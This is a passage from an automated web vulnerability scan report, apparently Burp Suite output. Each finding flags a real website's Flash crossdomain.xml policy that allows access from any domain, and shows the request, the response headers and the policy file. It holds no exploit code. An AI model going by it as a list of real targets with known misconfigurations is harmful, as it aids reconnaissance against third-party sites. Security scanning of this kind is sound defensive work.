P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 01:17:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:17:54 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.122. http://www.kiwicollection.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kiwicollection.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kiwicollection.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:06:03 GMT
Server: Apache
Last-Modified: Mon, 04 Apr 2011 20:55:31 GMT
ETag: "6a-4a01dfaea56c0"
Accept-Ranges: bytes
Content-Length: 106
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.123. http://www.kmel.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kmel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kmel.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3188345665 3188334116
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 01:31:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:31:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.124. http://www.koamtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.koamtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.koamtv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS37
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:9aa"
Cteonnt-Length: 208
Expires: Wed, 04 May 2011 01:09:24 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:09:24 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.125. http://www.kost1035.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kost1035.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kost1035.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 03 Mar 2010 20:22:57 GMT
Content-Type: application/xml
Content-Length: 350
X-Varnish: 3189579145
X-Cache-Server: varnish04
Expires: Wed, 04 May 2011 02:10:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:10:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.126. http://www.kstatesports.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.kstatesports.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.kstatesports.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:43:14 GMT
Server: Apache
P3P: policyref="http://www.cstv.com/w3c/p3p.xml",CP="IDC DSP COR CURa ADMo DEVo PSAo OUR DELi SAMi OTRi STP PHY ONL UNI PUR COM NAV INT DEM STA PRE"
Last-Modified: Wed, 18 Aug 2010 23:32:55 GMT
ETag: "1105556-e1-4c6c6da7"
Accept-Ranges: bytes
Content-Length: 225
Keep-Alive: timeout=300, max=997
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" ?><cross-domain-policy> <site-control permitted-cross-domain-policies="master-only"/> <allow-access-from domain="*"/> <allow-http-request-headers-from domain="*" headers="*"
...[SNIP]...

7.127. http://www.laketrust.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.laketrust.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.laketrust.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:03:16 GMT
Server: Apache
Last-Modified: Wed, 27 Apr 2011 14:38:41 GMT
ETag: "7c06b7-cd-659abe40"
Accept-Ranges: bytes
Content-Length: 205
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.128. http://www.leaderinsurance.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.leaderinsurance.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.leaderinsurance.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 22:40:50 GMT
Accept-Ranges: bytes
ETag: "71cd2fd5e2fecb1:0"
Server: Microsoft-IIS/7.0
Set-Cookie: TLTSID=299CB9294F1E8ED43CB279BD74B1FD81; Path=/; Domain=.leaderinsurance.com
Set-Cookie: TLTUID=299CB9294F1E8ED43CB279BD74B1FD81; Path=/; Domain=.leaderinsurance.com; expires=Wed, 04-05-2021 04:10:29 GMT
HostName: BHMWS12A2
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:10:29 GMT
Connection: close
Content-Length: 223

<?xml version="1.0" ?> <cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers="*"/>
...[SNIP]...

7.129. http://www.lifetributes.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.lifetributes.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.lifetributes.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:08:39 GMT
Server: Apache/2.2.4 (Win32)
Last-Modified: Wed, 24 Jan 2007 23:17:46 GMT
ETag: "8ef39-d0-80a43292"
Accept-Ranges: bytes
Content-Length: 208
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.130. http://www.limelinx.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.limelinx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.limelinx.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:49:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 29 Sep 2009 21:29:35 GMT
ETag: "20955c-cb-474be1c584dc0"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.131. http://www.ljmsite.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ljmsite.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ljmsite.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:45 GMT
Server: Apache/1.3.37 (Unix) mod_gzip/1.3.19.1a PHP/4.4.4 mod_ssl/2.8.28 OpenSSL/0.9.6m
Last-Modified: Sun, 13 Sep 2009 16:53:48 GMT
ETag: "1565258-4d-4aad239c"
Accept-Ranges: bytes
Content-Length: 77
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.132. http://www.logotv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.logotv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.logotv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Wed, 10 Feb 2010 18:44:34 GMT
ETag: "3ecb9e3-476-47f436cef4880"
Accept-Ranges: bytes
Content-Length: 1142
Content-Type: application/xml
Cache-Control: max-age=600
Date: Wed, 04 May 2011 02:37:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" secure="false" />
...[SNIP]...
<allow-access-from domain="http://localhost" />
   <allow-access-from domain="*.logoonline.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.logotv.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mtvi.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.schematic.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.mtvnservices.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.afterellen.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.afterelton.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.365gay.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.happiestgaycouple.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.newnownext.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.dragulator.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.atdmt.com" secure="false" />
...[SNIP]...

7.133. http://www.m-ms.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.m-ms.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.m-ms.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) DAV/2 mod_perl/2.0.0 Perl/v5.8.4
Last-Modified: Wed, 14 May 2008 21:07:50 GMT
ETag: "2c2f3-cf-2c61f580"
Accept-Ranges: bytes
Content-Length: 207
Content-Type: application/xml
Date: Wed, 04 May 2011 04:01:45 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

7.134. http://www.marble.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.marble.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marble.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:25:34 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 26 Mar 2010 15:09:03 GMT
ETag: "3650db-ca-482b58b3461c0"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Cache-Control: max-age=604800
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.135. http://www.mercadolivre.com.br/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mercadolivre.com.br
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mercadolivre.com.br

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat) DAV/2
Last-Modified: Wed, 16 Feb 2005 12:30:23 GMT
Cache-Control: max-age=360
Expires: Wed, 04 May 2011 03:29:05 GMT
Vary: Accept-Encoding
Content-Type: text/xml
Content-Length: 206
Date: Tue, 03 May 2011 23:20:54 GMT
X-Varnish: 2050195044
Age: 0
Connection: close
via: 1.1 Varnish (dblvarnish16)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.136. http://www.mibcn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mibcn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mibcn.com

Response

HTTP/1.1 200 OK
Set-Cookie: bcbsm=r210419866; path=/; expires=Wed, 11 May 2011 08:00:00 GMT
Server: Netscape-Enterprise/6.0
Date: Wed, 04 May 2011 01:40:04 GMT
Content-length: 108
Content-type: text/xml
Last-modified: Thu, 28 Dec 2006 17:58:53 GMT
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


7.137. http://www.mixbook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mixbook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mixbook.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:10:59 GMT
Content-Type: text/xml
Content-Length: 315
Last-Modified: Fri, 11 Mar 2011 07:49:29 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

7.138. http://www.motion-vr.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motion-vr.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motion-vr.net

Response

HTTP/1.1 200 OK
Content-Length: 202
Content-Type: text/xml
Last-Modified: Sat, 02 Feb 2008 04:45:05 GMT
Accept-Ranges: bytes
ETag: "428a1a615665c81:3ac6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 04:12:05 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

7.139. http://www.motorracingnetwork.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.motorracingnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.motorracingnetwork.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 12 Dec 2008 23:09:32 GMT
Accept-Ranges: bytes
ETag: "8e12fbb0ae5cc91:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 347
Cache-Control: max-age=198206
Date: Wed, 04 May 2011 03:23:22 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.140. http://www.mygames4girls.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mygames4girls.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mygames4girls.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:47:57 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.5-0.dotdeb.0 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Wed, 03 Jun 2009 10:34:15 GMT
ETag: "b88d-cc-46b6f336a77c0"
Accept-Ranges: bytes
Content-Length: 204
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 01:47:57 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

7.141. http://www.myjizztube.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.myjizztube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.myjizztube.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:25:19 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.17
Last-Modified: Sun, 17 Jan 2010 05:18:40 GMT
ETag: "138-4b529db0"
Accept-Ranges: bytes
Content-Length: 312
Connection: close
Content-Type: application/xml
X-Pad: avoid browser bug

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*" />
...[SNIP]...

7.142. http://www.nbcolympics.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nbcolympics.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.nbcolympics.com

Response

HTTP/1.0 200 OK
Content-Length: 203
Content-Type: text/html
Cache-Control: max-age=60, must-revalidate
X-Powered-By: ASP.NET
Vary: User-Agent
ETag: "0d78cc9bc5fc81:0"
Date: Wed, 04 May 2011 02:08:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

7.143. http://www.netfilia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.netfilia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netfilia.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:12:08 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Tue, 03 May 2011 17:04:02 GMT
ETag: "1fcad7-1a5-4a2622076e480"
Accept-Ranges: bytes
Content-Length: 421
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>

<!--
Document : crossdomain.xml
Created on : 15 de noviembre de 2010, 12:56
Author : ricardo
Description:
Purpose of the document
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

7.144. http://www.oakridger.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.oakridger.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oakridger.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:24:31 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache1.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache1.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

7.145. http://www.opt-intelligence.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.opt-intelligence.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.opt-intelligence.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=MLVJMZS192.168.1.210CKMWL; path=/
Date: Wed, 04 May 2011 02:57:28 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Thu, 15 Jan 2009 15:53:09 GMT
Accept-Ranges: bytes
Content-Length: 264
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
   <allow-access-from domain="www.clear-request.com" />
...[SNIP]...

7.146. http://www.papayaclothing.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.papayaclothing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.papayaclothing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:54 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.25
Last-Modified: Thu, 01 Oct 2009 01:10:12 GMT
ETag: "6a30003-4c-474d54f2c4500"
Accept-Ranges: bytes
Content-Length: 76
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

7.147. http://www.parsons.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.parsons.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.parsons.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 01:53:10 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6300
X-Powered-By: ASP.NET
Last-Modified: Fri, 19 Dec 2008 07:21:53 GMT
ETag: "{9F3B342C-90D2-4CD1-BE32-7F6987BC2EED},4"
ResourceTag: rt:9F3B342C-90D2-4CD1-BE32-7F6987BC2EED@00000000004
Content-Type: text/xml
Exires: Tue, 19 Apr 2011 01:53:10 GMT
Cache-Control: private,max-age=0
Content-Length: 199
Public-Extension: http://schemas.microsoft.com/repl-2

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

7.148. http://www.paulmccartney.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paulmccartney.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paulmccartney.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Ubuntu)
Content-Type: application/xml
Date: Wed, 04 May 2011 02:11:33 GMT
Keep-Alive: timeout=15, max=98
Accept-Ranges: bytes
ETag: "3f0420-d0-487a772abea00"
Connection: close
Set-Cookie: X-Mapping-fjhppofk=E9DDEBB6D4545781CAC506A0D31E0BF2; path=/
Last-Modified: Fri, 28 May 2010 13:26:00 GMT
Content-Length: 208

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...

7.149. http://www.plaindealer.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.plaindealer.com
Path:   /crossdomain.xml

Issue detail

